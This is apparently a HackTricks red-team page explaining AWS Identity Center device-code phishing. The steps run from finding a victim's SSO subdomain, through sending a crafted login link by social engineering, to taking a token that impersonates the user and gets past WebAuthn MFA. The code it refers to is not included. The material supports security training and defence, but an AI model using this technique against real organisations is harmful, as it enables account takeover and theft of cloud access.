AWS - Identity Center & SSO Unauthenticated Enum
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Initially proposed in this blog post, it's possible to send a link to a user using AWS SSO that if the user accepts the attacker will be able to get a token to impersonate the user and access all the roles the user is able to access in the Identity Center.
In order to perform this attack the requisites are:
The victim needs to use Identity Center
The attacker must know the subdomain used by the victim <victimsub>.awsapps.com/start
Just with the previous info, the attacker will be able to send a link to the user that if accepted will grant the attacker access over the AWS user account.
Finding the subdomain
The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via OSINT or guessing + BF as most companies will be using their name or a variation of their name here.
With this info, it's possible to get the region where the Indentity Center was configured with:
Generate the link for the victim & Send it
Run the following code to generate an AWS SSO login link so the victim can authenticate. For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token:
Send the generated link to the victim using you awesome social engineering skills!
Wait until the victim accepts it
If the victim was already logged in AWS he will just need to accept granting the permissions, if he wasn't, he will need to login and then accept granting the permissions. This is how the promp looks nowadays:
Get SSO access token
If the victim accepted the prompt, run this code to generate a SSO token impersonating the user:
The SSO access token is valid for 8h.
Impersonate the user
It's fun to know that the previous attack works even if an "unphisable MFA" (webAuth) is being used. This is because the previous workflow never leaves the used OAuth domain. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a code is known by a device and the user can login even in a different machine. If accepted the prompt, the device, just by knowing the initial code, is going to be able to retrieve credentials for the user.
For more info about this check this post.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)